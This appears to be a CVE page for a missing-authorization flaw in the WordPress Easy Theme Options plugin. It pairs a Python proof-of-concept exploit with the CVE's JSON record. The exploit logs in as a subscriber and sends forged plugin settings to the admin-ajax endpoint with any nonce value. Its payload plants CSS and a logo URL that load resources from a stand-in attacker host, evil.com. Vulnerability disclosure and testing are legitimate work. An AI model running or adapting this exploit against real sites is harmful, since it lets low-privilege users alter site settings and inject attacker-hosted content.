CVE-2025-14367

# CVE-2025-14367 PoC - Easy Theme Options Missing Authorization # This PoC demonstrates how an authenticated user with Subscriber role can exploit # the missing authorization check in eto_import_settings function import requests import json target_url = "http://target-wordpress-site.com" username = "attacker" password = "password123" # Step 1: Authenticate and get nonce session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data) # Step 2: Craft malicious settings payload # Attacker can import arbitrary plugin settings malicious_settings = { "eto_options": { "theme_color": "#malicious", "custom_css": "body {background: url('http://evil.com/malicious.js')}", "logo_url": "http://evil.com/fake-logo.png" } } # Step 3: Exploit via AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { "action": "eto_import_settings", "eto_import_settings": json.dumps(malicious_settings), "security": "any_value_accepted" } response = session.post(ajax_url, data=exploit_data) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text}") # Step 4: Verify settings were imported verify_url = f"{target_url}/wp-admin/admin.php?page=easy-theme-options" verify_response = session.get(verify_url) if "malicious" in verify_response.text: print("[+] Exploitation successful! Settings have been modified.") else: print("[-] Exploitation may have failed.")

{"cve": {"id": "CVE-2025-14367", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:48.790", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Theme Options plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.0. This is due to missing authorization checks in the eto_import_settings function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to import arbitrary plugin settings via the 'eto_import_settings' parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/easy-theme-options/tags/1.0/easy-theme-options.php#L277", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-theme-options/tags/1.0/easy-theme-options.php#L282", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8405e80d-fd72-4d87-b08a-19a686eb2982?source=cve", "source": "[email protected]"}]}}